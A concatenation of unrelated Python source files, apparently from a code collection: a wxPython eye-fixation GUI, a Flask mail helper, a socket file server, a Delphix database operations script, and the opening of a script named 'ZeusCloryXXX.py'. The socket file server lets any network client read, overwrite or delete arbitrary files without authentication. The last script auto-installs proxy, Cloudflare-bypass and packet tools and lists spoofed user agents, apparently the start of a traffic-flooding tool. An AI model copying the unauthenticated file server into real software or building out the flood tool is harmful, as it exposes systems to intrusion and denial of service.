if not self.protocolpane.is_protocol_empty():
md = wx.MessageDialog(self, "Protocol already exists! Overwrite or Append to existing protocol?",
"Protocol already exists!", wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL)
md.SetYesNoCancelLabels("Overwrite", "Append", "Cancel")
result = md.ShowModal()
if result == wx.ID_YES:
self.protocolpane.clear_protocol()
self.viewpane.clear_locations()
self.protocolpane.load_protocol(protopath)
elif result == wx.ID_NO:
self.protocolpane.load_protocol(protopath)
## self.update_protocol(self.vert_loc,self.horz_loc)
def on_clear_protocol(self, evt=None):
dlg = wx.MessageDialog(None, 'Are you sure you want to clear the protocol?', 'Clear Protocol',
wx.YES_NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
if result == wx.ID_YES:
self.protocolpane.clear_protocol()
self.viewpane.clear_locations()
self._locationfname = None
def on_open_background_image(self, evt=None):
dialog = wx.FileDialog(self, 'Select background image:', self.header_dir, self.filename,
'Image files (*.jpg,*.jpeg,*.bmp,*.png,*.tif,*.tiff)| *.jpg;*.jpeg;*.bmp;*.png;*.tif;*.tiff|' +
'JP(E)G images (*.jpg,*.jpeg)|*.jpg;*.jpeg|BMP images (*.bmp)|*.bmp' +
'|PNG images (*.png)|*.png|TIF(F) images (*.tif,*.tiff)|*.tif;*.tiff', wx.FD_OPEN)
if dialog.ShowModal() == wx.ID_OK:
self.header_dir = dialog.GetDirectory()
self.filename = dialog.GetFilename()
dialog.Destroy()
impath = self.header_dir + os.sep + self.filename
bkgrdim = wx.EmptyBitmap(1, 1)
bkgrdim.LoadFile(impath, wx.BITMAP_TYPE_ANY)
self.viewpane.set_bkgrd(bkgrdim)
def degrees_to_screenpix(self, deghorz, degvert):
# Converts Degrees to Screen Pixels - X should be POSITIVE going left on screen for OD
x = -deghorz * self.SCREEN_PPD
y = -degvert * self.SCREEN_PPD
return x, y
def on_keyboard_press(self, event):
# Allows For Arrow Control Of The Cursor
if event.GetKeyCode() == wx.WXK_F4:
evt = MessageEvent(myEVT_RETURN_MESSAGE, -1, 4, "F4")
wx.PostEvent(self, evt)
# elif event.GetKeyCode() == wx.WXK_NUMPAD_SUBTRACT:
# self.zoom_out(self)
if self.viewpane.align_on is True:
self.on_image_alignment(event)
elif self.viewpane.align_on is False:
self.on_move_fixation(event)
def on_image_alignment(self, event):
if event.ControlDown(): # The image can only be moved if Control is being held down!
if event.GetKeyCode() == wx.WXK_DOWN:
self.viewpane.pan_y = self.viewpane.pan_y + self.MINOR_INCREMENT
self.viewpane.int_Graph()
elif event.GetKeyCode() == wx.WXK_UP:
self.viewpane.pan_y = self.viewpane.pan_y - self.MINOR_INCREMENT
self.viewpane.int_Graph()
elif event.GetKeyCode() == wx.WXK_LEFT:
self.viewpane.pan_x = self.viewpane.pan_x - self.MINOR_INCREMENT
self.viewpane.int_Graph()
elif event.GetKeyCode() == wx.WXK_RIGHT:
self.viewpane.pan_x = self.viewpane.pan_x + self.MINOR_INCREMENT
self.viewpane.int_Graph()
else:
self.on_move_fixation(event)
event.Skip()
def on_move_fixation(self, event):
if event.GetKeyCode() == wx.WXK_DOWN:
if event.ShiftDown():
self.vert_loc = self.vert_loc - self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.vert_loc = self.vert_loc - self.MAJOR_INCREMENT
self.update_fixation_location()
elif event.GetKeyCode() == wx.WXK_UP:
if event.ShiftDown():
self.vert_loc = self.vert_loc + self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.vert_loc = self.vert_loc + self.MAJOR_INCREMENT
self.update_fixation_location()
elif event.GetKeyCode() == wx.WXK_LEFT:
if event.ShiftDown():
self.horz_loc = self.horz_loc - self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.horz_loc = self.horz_loc - self.MAJOR_INCREMENT
self.update_fixation_location()
elif event.GetKeyCode() == wx.WXK_RIGHT:
if event.ShiftDown():
self.horz_loc = self.horz_loc + self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.horz_loc = self.horz_loc + self.MAJOR_INCREMENT
self.update_fixation_location()
else:
event.Skip()
def on_eye_select(self, event):
# Changes Cursor And Location Names Based On on_eye_select Selected cursor
state = str(self.control.OS.GetValue())
if state == 'True': # If it is OS, eyesign is -1
self._eyesign = -1
self.r_text.SetLabel('T\ne\nm\np\no\nr\na\nl')
self.l_text.SetLabel(' \n \nN\na\ns\na\nl\n \n')
self.control.horzcontrol.flip_labels()
self.update_fixation_location()
elif state == 'False': # If it is OD, eyesign is 1
self._eyesign = 1
self.r_text.SetLabel(' \n \nN\na\ns\na\nl\n \n')
self.l_text.SetLabel('T\ne\nm\np\no\nr\na\nl')
self.control.horzcontrol.flip_labels()
self.update_fixation_location()
def on_minor_step(self, event):
self.MINOR_INCREMENT = self.control.minorStep.GetValue()
self.control.horzcontrol.SetIncrement(self.MINOR_INCREMENT)
self.control.vertcontrol.SetIncrement(self.MINOR_INCREMENT)
def on_major_step(self, event):
self.MAJOR_INCREMENT = self.control.majorStep.GetValue()
def on_vert_spin(self, event):
# Entering a vertical location value using the subclass
y_ent = self.control.vertcontrol.GetValue()
self.vert_loc = round(float(y_ent), 2)
self.update_fixation_location()
def on_horz_spin(self, event):
# Entering a horizontal location value using the subclass
x_ent = self.control.horzcontrol.GetValue()
self.horz_loc = round(float(x_ent), 2)
self.update_fixation_location()
def mark_location(self, data):
# Marks the current lcoation of the fixation target, and dumps it to a file
self.viewpane.mark_location()
self.update_protocol(self.control.horzcontrol.get_label_value(), self.control.vertcontrol.get_label_value())
self.save_location(self.control.horzcontrol.get_value(), self.control.vertcontrol.get_value(), str(data))
def set_FOV(self, fov):
if fov != -1:
self.viewpane.set_fov(fov)
def update_fixation_color(self, penColor, brushColor):
# This method allows the user to change the color on the LightCrafter DLP.
self.LCCanvas.set_fixation_color(penColor, brushColor)
def update_fixation_cursor(self, cursor):
# This method allows the user to change the cursor type on the LightCrafter DLP.
self.LCCanvas.set_fixation_cursor(cursor)
def update_fixation_cursor_size(self, size):
# This method allows the user to change the cursor size on the LightCrafter DLP.
self.LCCanvas.set_fixation_size(size)
def reset_fixation_location(self, event):
# Reset fixation target Location
self.horz_loc = 0.0
self.vert_loc = 0.0
self.update_fixation_location()
def update_protocol(self, horzloc, vertloc):
# Send a query to our protocol pane, marking a new location if there is one or fulfilling a protocol requirement
self.protocolpane.update_protocol(
(self.control.horzcontrol.get_label_value(), self.control.vertcontrol.get_label_value()), self._eyesign,
self.viewpane.get_fov())
def save_location(self, horzloc, vertloc, vidnum="-1"):
# Create a file that we will dump all of the relevant information to
if self._locationfname is None:
# If it doesn't exist, then prompt for the location before continuing...
self.on_set_save_protocol_location()
try:
self._locfileobj = open(self._locationpath + os.sep + self._locationfname, 'a')
except IOError: # If there is an exception, then the file is already open, or is being written to
if self._locfileobj.closed:
pass
## print "Failed to open location dump file!"
return
else:
pass
## print "File is already open, continuing..."
if self._eyesign == -1:
eye = "OS"
else:
eye = "OD"
print(vidnum)
self._locfileobj.write(str(vidnum) + "," + str(horzloc) + "," + str(vertloc) + "," +
str(self.viewpane.get_h_fov()) + "," + str(self.viewpane.get_v_fov()) +
"," + eye + "\n")
self._locfileobj.close()
# Saves The Aligned ViewPane
def save_viewpane(self, event):
context = wx.ClientDC(self.imagespace)
memory = wx.MemoryDC()
x, y = self.imagespace.ClientSize
bitmap = wx.EmptyBitmap(x, y, wx.ID_ANY)
memory.SelectObject(bitmap)
memory.Blit(0, 0, x, y, context, 0, 0)
memory.SelectObject(wx.NullBitmap)
wx.InitAllImageHandlers()
self.filename = ''
dialog = wx.FileDialog(self, 'Save Aligned ViewPane As:', self.save_image_dir, self.filename, '*.jpeg*',
wx.SAVE | wx.FD_OVERWRITE_PROMPT)
if dialog.ShowModal() == wx.ID_OK:
self.save_image_dir = dialog.GetDirectory()
self.filename = dialog.GetFilename()
dialog.Destroy()
bitmap.SaveFile(self.filename + '.jpeg', wx.BITMAP_TYPE_JPEG)
# Exits The Application
def on_quit(self, event=wx.EVT_CLOSE):
self.LCCanvas.Destroy()
self.Destroy()
class MessageEvent(wx.PyCommandEvent):
"""Event to signal that a count value is ready"""
def __init__(self, etype, eid, datatype=-1, data=-1):
"""Creates the event object"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._datatype = datatype
self._data = data
def get_datatype(self):
return self._datatype
def get_data(self):
return self._data
# This thread class generically listens to a queue, and passes what it receives to a specified function.
class ConnListener(asyncore.dispatcher):
def __init__(self, parent):
asyncore.dispatcher.__init__(self)
self.thisparent = parent
self.HOST = 'localhost'
self.PORT = 1222
self.buffer = []
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind((self.HOST, self.PORT))
print("Listening for a careless whisper from a queue thread...")
self.listen(1)
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock, addr = pair
QueueListener(self.thisparent, sock=sock)
print("Incoming connection from " + repr(addr))
class QueueListener(asyncore.dispatcher_with_send):
def __init__(self, parent=None, sock=None, map=None):
asyncore.dispatcher.__init__(self, sock, map)
self.thisparent = parent
self.out_buffer = b''
self.thisparent.Bind(EVT_RETURN_MESSAGE, self.handle_return_message)
def handle_return_message(self, evt):
# print("Sending!")
self.send(evt.get_data().encode("utf-8"))
def handle_read(self):
try:
recvmsg = self.recv(32).decode("utf-8")
# print("Recieved: "+recvmsg)
list_o_msg = recvmsg.split("!")
for msg in list_o_msg:
if msg:
# print("Parsing: " + msg)
splitmsg = msg.split(";")
if len(splitmsg) == 2:
evt = MessageEvent(myEVT_MESSAGE, -1, int(splitmsg[0]), splitmsg[1])
else:
evt = MessageEvent(myEVT_MESSAGE, -1, int(splitmsg[0]), splitmsg[1:])
wx.PostEvent(self.thisparent, evt)
if int(splitmsg[0]) == -1:
self.close()
return
except ConnectionResetError:
print("Lost connection to the image whisperer!")
md = wx.MessageDialog(None, "Lost connection to the image whisperer! Protocol list will no longer update.",
"Lost connection to the image whisperer!", wx.ICON_ERROR | wx.OK)
md.ShowModal()
return
# Shows The Window
if __name__ == '__main__':
app = wx.App(redirect=False)
frame = wxFixationFrame(None)
frame.Show()
app.MainLoop()
|
email.py
|
from threading import Thread
# from flask.ext.mail import Message
from flask_mail import Message
from app import app, mail
def send(recipient, subject, body):
'''
Send a mail to a recipient. The body is usually a rendered HTML template.
The sender's credentials has been configured in the config.py file.
'''
sender = app.config['ADMINS'][0]
message = Message(subject, sender=sender, recipients=[recipient])
message.html = body
# Create a new thread
thr = Thread(target=send_async, args=[app, message])
thr.start()
def send_async(app, message):
''' Send the mail asynchronously. '''
with app.app_context():
mail.send(message)
|
socket_file_server.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2018 NSF Center for Space, High-performance, and Resilient Computing (SHREC)
University of Pittsburgh. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
OF SUCH DAMAGE.
"""
from socket import AF_INET, SOCK_STREAM, socket
from threading import Thread
from os import remove
def receive_server():
with socket(AF_INET, SOCK_STREAM) as sock:
sock.bind(('', 60124))
sock.listen(5)
while True:
connection, address = sock.accept()
file_to_receive = connection.recv(4096).decode('utf-8', 'replace')
while '\n' not in file_to_receive:
file_to_receive += connection.recv(4096).decode('utf-8',
'replace')
file_to_receive = file_to_receive.split('\n')[0]
connection.close()
connection, address = sock.accept()
with open(file_to_receive, 'wb') as file_to_receive:
data = connection.recv(4096)
while data:
file_to_receive.write(data)
data = connection.recv(4096)
connection.close()
def send_server():
with socket(AF_INET, SOCK_STREAM) as sock:
sock.bind(('', 60123))
sock.listen(5)
while True:
connection, address = sock.accept()
file_to_send = connection.recv(4096).decode('utf-8', 'replace')
while '\n' not in file_to_send:
file_to_send += connection.recv(4096).decode('utf-8', 'replace')
file_to_send = file_to_send.split('\n')[0]
if ' ' in file_to_send:
args = file_to_send.split(' ')
file_to_send = args[0]
delete = args[1] == '-r'
else:
delete = False
try:
with open(file_to_send, 'rb') as data:
connection.sendall(data.read())
except:
print('socket_file_server.py: could not open file:',
file_to_send)
else:
try:
if delete:
remove(file_to_send)
print('socket_file_server.py: deleted file:',
file_to_send)
except:
print('socket_file_server.py: could not delete file:',
file_to_send)
finally:
connection.close()
Thread(target=receive_server).start()
Thread(target=send_server).start()
|
dx_operations.py
|
#!/usr/bin/env python
# Corey Brune - Oct 2016
# This script starts or stops a VDB
# requirements
# pip install docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
"""List all VDBs or Start, stop, enable, disable a VDB
Usage:
dx_operations_vdb.py (--vdb <name> [--stop | --start | --enable | --disable] | --list | --all_dbs <name>)
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_operations_vdb.py -h | --help | -v | --version
List all VDBs, start, stop, enable, disable a VDB
Examples:
dx_operations_vdb.py --engine landsharkengine --vdb testvdb --stop
dx_operations_vdb.py --vdb testvdb --start
dx_operations_vdb.py --all_dbs enable
dx_operations_vdb.py --all_dbs disable
dx_operations_vdb.py --list
Options:
--vdb <name> Name of the VDB to stop or start
--start Stop the VDB
--stop Stop the VDB
--all_dbs <name> Enable or disable all dSources and VDBs
--list List all databases from an engine
--enable Enable the VDB
--disable Disable the VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION = 'v.0.3.015'
import sys
from os.path import basename
from time import sleep, time
import traceback
from delphixpy.exceptions import HttpError
from delphixpy.exceptions import JobError
from delphixpy.exceptions import RequestError
from delphixpy.web import database
from delphixpy.web import job
from delphixpy.web import source
from delphixpy.web.capacity import consumer
from docopt import docopt
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxLogging import print_exception
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import find_all_objects
from lib.GetReferences import find_obj_list
from lib.GetSession import GetSession
def dx_obj_operation(dlpx_obj, vdb_name, operation):
"""
Function to start, stop, enable or disable a VDB
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
:param vdb_name: Name of the object to stop/start/enable/disable
:type vdb_name: str
:param operation: enable or disable dSources and VDBs
:type operation: str
"""
print_debug('Searching for {} reference.\n'.format(vdb_name))
engine_name = dlpx_obj.dlpx_engines.keys()[0]
vdb_obj = find_obj_by_name(dlpx_obj.server_session, source, vdb_name)
try:
if vdb_obj:
if operation == 'start':
source.start(dlpx_obj.server_session, vdb_obj.reference)
elif operation == 'stop':
source.stop(dlpx_obj.server_session, vdb_obj.reference)
elif operation == 'enable':
source.enable(dlpx_obj.server_session, vdb_obj.reference)
elif operation == 'disable':
source.disable(dlpx_obj.server_session,
vdb_obj.reference)
dlpx_obj.jobs[engine_name] = dlpx_obj.server_session.last_job
except (RequestError, HttpError, JobError, AttributeError), e:
print_exception('An error occurred while performing {} on {}:\n'
'{}'.format(operation, vdb_name, e))
print '{} was successfully performed on {}.'.format(operation, vdb_name)
def all_databases(dlpx_obj, operation):
"""
Enable or disable all dSources and VDBs on an engine
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
:param operation: enable or disable dSources and VDBs
:type operation: str
"""
for db in database.get_all(dlpx_obj.server_session):
try:
dx_obj_operation(dlpx_obj, db.name, operation)
except (RequestError, HttpError, JobError):
pass
print '{} {}\n'.format(operation, db.name)
sleep(2)
def list_databases(dlpx_obj):
"""
Function to list all databases for a given engine
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
"""
source_stats_lst = find_all_objects(dlpx_obj.server_session, source)
is_dSource = None
try:
for db_stats in find_all_objects(dlpx_obj.server_session,
consumer):
source_stats = find_obj_list(source_stats_lst, db_stats.name)
if source_stats is not None:
if source_stats.virtual is False:
is_dSource = 'dSource'
elif source_stats.virtual is True:
is_dSource = db_stats.parent
print('name: {},provision container: {},database disk '
'usage: {:.2f} GB,Size of Snapshots: {:.2f} GB,'
'Enabled: {},Status:{},'.format(str(db_stats.name),
str(is_dSource),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024,
source_stats.runtime.enabled,
source_stats.runtime.status))
elif source_stats is None:
print('name = {},provision container= {},database disk '
'usage: {:.2f} GB,Size of Snapshots: {:.2f} GB,'
'Could not find source information. This could be a '
'result of an unlinked object'.format(
str(db_stats.name), str(db_stats.parent),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024))
except (RequestError, JobError, AttributeError, DlpxException) as e:
print 'An error occurred while listing databases: {}'.format((e))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine, dlpx_obj):
"""
This function is where we create our main workflow.
Use the @run_async decorator to run this function asynchronously.
The @run_async decorator allows us to run against multiple Delphix Engine
simultaneously
:param engine: Dictionary of engines
:type engine: dictionary
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
"""
try:
# Setup the connection to the Delphix Engine
dlpx_obj.serversess(engine['ip_address'], engine['username'],
engine['password'])
except DlpxException as e:
print_exception('ERROR: Engine {} encountered an error while'
'{}:\n{}\n'.format(engine['hostname'],
arguments['--target'], e))
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dlpx_obj.job_mode(single_thread):
while len(dlpx_obj.jobs) > 0 or len(thingstodo) > 0:
if len(thingstodo)> 0:
if arguments['--start']:
dx_obj_operation(dlpx_obj, arguments['--vdb'], 'start')
elif arguments['--stop']:
dx_obj_operation(dlpx_obj, arguments['--vdb'], 'stop')
elif arguments['--enable']:
dx_obj_operation(dlpx_obj, arguments['--vdb'], 'enable')
elif arguments['--disable']:
dx_obj_operation(dlpx_obj, arguments['--vdb'],
'disable')
elif arguments['--list']:
list_databases(dlpx_obj)
elif arguments['--all_dbs']:
all_databases(dlpx_obj, arguments['--all_dbs'])
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in dlpx_obj.jobs.keys():
job_obj = job.get(dlpx_obj.server_session, dlpx_obj.jobs[j])
print_debug(job_obj)
print_info('{}: Running JS Bookmark: {}'.format(
engine['hostname'], job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the running jobs list.
del dlpx_obj.jobs[j]
elif job_obj.job_state in 'RUNNING':
# If the job is in a running state, increment the
# running job count.
i += 1
print_info('{}: {:d} jobs running.'.format(
engine['hostname'], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dlpx_obj.jobs) > 0:
sleep(float(arguments['--poll']))
except (DlpxException, RequestError, JobError, HttpError) as e:
print_exception('Error in js_bookmark: {}\n{}'.format(
engine['hostname'], e))
sys.exit(1)
def time_elapsed(time_start):
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
:param time_start: start time of the script.
:type time_start: float
"""
return round((time() - time_start)/60, +1)
def run_job(dlpx_obj, config_file_path):
"""
This function runs the main_workflow aynchronously against all the
servers specified
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
:param config_file_path: string containing path to configuration file.
:type config_file_path: str
"""
# Create an empty list to store threads we create.
threads = []
engine = None
# If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info('Executing against all Delphix Engines in the dxtools.conf')
try:
# For each server in the dxtools.conf...
for delphix_engine in dlpx_obj.dlpx_engines:
engine = dlpx_obj.dlpx_engines[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine, dlpx_obj))
except DlpxException as e:
print_exception('Error encountered in run_job():\n{}'.format(e))
sys.exit(1)
elif arguments['--all'] is False:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dlpx_obj.dlpx_engines[arguments['--engine']]
print_info('Executing against Delphix Engine: {}\n'.format(
arguments['--engine']))
except (DlpxException, RequestError, KeyError):
raise DlpxException('\nERROR: Delphix Engine {} cannot be '
'found in {}. Please check your value and'
' try again. Exiting.\n'.format(
arguments['--engine'], config_file_path))
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dlpx_obj.dlpx_engines:
if dlpx_obj.dlpx_engines[delphix_engine]['default'] == 'true':
engine = dlpx_obj.dlpx_engines[delphix_engine]
print_info('Executing against the default Delphix Engine '
'in the dxtools.conf: {}'.format(
dlpx_obj.dlpx_engines[delphix_engine]['hostname']))
break
if engine is None:
raise DlpxException('\nERROR: No default engine found. Exiting')
# run the job against the engine
threads.append(main_workflow(engine, dlpx_obj))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def main():
# We want to be able to call on these variables anywhere in the script.
global single_thread
global debug
time_start = time()
single_thread = False
try:
dx_session_obj = GetSession()
logging_est(arguments['--logdir'])
print_debug(arguments)
config_file_path = arguments['--config']
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job(dx_session_obj, config_file_path)
elapsed_minutes = time_elapsed(time_start)
print_info('script took {:.2f} minutes to get this far.'.format(
elapsed_minutes))
# Here we handle what we do when the unexpected happens
except SystemExit as e:
# This is what we use to handle our sys.exit(#)
sys.exit(e)
except DlpxException as e:
# We use this exception handler when an error occurs in a function call.
print_exception('ERROR: Please check the ERROR message below:\n'
'{}'.format(e.message))
sys.exit(2)
except HttpError as e:
# We use this exception handler when our connection to Delphix fails
print_exception('ERROR: Connection failed to the Delphix Engine. Please'
'check the ERROR message below:\n{}'.format(e.message))
sys.exit(2)
except JobError as e:
# We use this exception handler when a job fails in Delphix so that we
# have actionable data
print_exception('A job failed in the Delphix Engine:\n{}'.format(e.job))
elapsed_minutes = time_elapsed(time_start)
print_exception('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
sys.exit(3)
except KeyboardInterrupt:
# We use this exception handler to gracefully handle ctrl+c exits
print_debug('You sent a CTRL+C to interrupt the process')
elapsed_minutes = time_elapsed(time_start)
print_info('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
except:
# Everything else gets caught here
print_exception('{}\n{}'.format(sys.exc_info()[0],
traceback.format_exc()))
elapsed_minutes = time_elapsed(time_start)
print_info("{} took {:.2f} minutes to get this far".format(
basename(__file__), elapsed_minutes))
sys.exit(1)
if __name__ == "__main__":
# Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main()
|
ZeusCloryXXX.py
|
import os, sys, codecs
try:
import socks, requests, wget, cfscrape, urllib3
except:
if sys.platform.startswith("linux"):
os.system("pip3 install pysocks requests wget cfscrape urllib3 scapy")
elif sys.platform.startswith("freebsd"):
os.system("pip3 install pysocks requests wget cfscrape urllib3 scapy")
else:
os.system("pip install pysocks requests wget cfscrape urllib3 scapy")
import random
import socket
import threading
import time
import os
useragents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
